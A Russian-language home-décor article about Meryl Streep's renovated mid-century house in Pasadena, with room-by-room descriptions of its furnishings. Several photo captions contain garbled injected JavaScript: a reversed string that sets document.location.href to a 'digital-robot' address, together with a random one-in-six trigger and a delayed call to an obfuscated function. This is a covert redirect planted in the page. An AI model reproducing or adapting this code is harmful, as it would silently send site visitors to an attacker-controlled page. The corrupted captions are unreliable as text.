Добавить в закладки

Дом Мерил Стрип в Калифорнии за 3,6 миллиона долларов

Одна из величайших актрис современности Мерил Стрип трехкратная обладательница премии «Оскар» и множества других кинонаград. Среди ее известных работ роли в фильмах «Охотник на оленей», «Дьявол носит Prada», «Железная леди», а также недавняя роль в популярном сериале «Большая маленькая ложь».

Мерил Стрип

Мерил Стрип. Фото: posta-magazine.ru

Активный образ жизни заставляет Мерил проводить много времени в шумных городах, но отдыхать она предпочитает в своем загородном доме, интерьер которого мы и рассмотрим.

Дом площадью 280 квадратных метров расположен в Пасадене, Калифорния

К прилежащей территории в 2 гектара ведет отдельный подъезд с главной дороги.

Частный подъезд к дому

Частный подъезд к дому. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos.zillowstatic.com»>photobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos.zillowstatic.com

Участок засажен разными породами деревьев, кустарников.

Благоустройство двора

Благоустройство двора. Фото: dlzx9e7gl8jc4.cloudfront.net

Вокруг самого здания посажены японские деревья, выложены каменные дорожки, идущие к небольшому «оазису» в виде бассейна.

Бассейн во дворе

Бассейн во дворе. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos.zillowstatic.com»>photobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos.zillowstatic.com

Одноэтажный дом был построен в 1959 году

Чтобы провести реконструкцию актриса обратилась в архитекторское бюро. Мастера оформили сооружение в модном американском стиле середины прошлого столетия. Внутри поместилось 3 спальни с примыкающими к ним уборными, гостиная, объединенная со столовой, кухня, а также небольшой кабинет рядом с одной из комнат отдыха.

Большая часть стен состоит из оконных стекол во всю высоту

Потолки в комнатах обработаны деревянными досками с вмонтированными точечными лампами, кроме прихожей с окрашенным в серый цвет потолком. Пол здесь обработан плитами с рисунком морской гальки. Сверху раскинут ковер в виде шкуры зебры. У стены стоит антикварный буфет с декоративной изумрудной тарелкой, высокий деревянный стул красного цвета и растения в высоких горшках. Справа расположен «белый» коридор к спальням, а слева выход к гостиной.

Прихожая

Прихожая. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos.zillowstatic.com»>photobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos.zillowstatic.com

Главным украшением гостиной стал настоящий камин

Дымоход немного выступает из стены, облицованной белой плиткой. Он и нижний выступ сделан из мрамора. Напротив расположены кресла, диван с белой обивкой, два глянцевых журнальных столика, несколько подставок. У окна на стене висит картина, а рядом стоит торшер с тремя оригинальными абажурами. Пол выложен паркетом в диагональном направлении. Под мебелью раскинут мягкий ковер в серых оттенках.

Гостиная

Гостиная. Фото: dlzx9e7gl8jc4.cloudfront.net

Разделяется пространство подпотолочной опорой из деревянной балки

Между гостиной и столовой также стоит старинный шкаф с черными фасадами. Столовая обозначена ковриком с похожим принтом, как в гостиной, но уже в коричневой цветовой гамме. Вокруг деревянного стола с массивными ножками расставлены мягкие стулья. Обивка выполнена из светлой хлопковой ткани, а ножки из темного дерева. Дверной кухонный проем сделан из металлической рамы.

Столовая

Столовая. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos.zillowstatic.com»>photobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos.zillowstatic.com

Спальня с кабинетом обработана белой краской

В центре зоны отдыха расположена двуспальная кровать, напротив которой в стене вмонтирован большой шкаф. На полу расстелен половик, а сверху свисает небольшая люстра с круглым абажуром.

Фрагмент спальни

Фрагмент спальни. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos.zillowstatic.com»>photobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos.zillowstatic.com

Возле входа есть уютное место для утреннего кофе или чтения книги по вечерам, состоящее из мягкого кресла на деревянном каркасе, круглой подставки и торшера.

Фрагмент спальни

Фрагмент спальни. Фото: dlzx9e7gl8jc4.cloudfront.net

В небольшом кабинете у окна размещен черный кожаный диван с золотистой подставкой. Рядом на стене висит картина, а дальше стоит черный письменный стол и комфортное кресло с ортопедической спинкой из белой кожи, натянутой на металлический каркас.

Кабинет

Кабинет. Фото: dlzx9e7gl8jc4.cloudfront.net

Загородный дом Мерил Стрип – это идеальное место для воссоединения с природой и наслаждения каждым новым днем.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 08.07.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: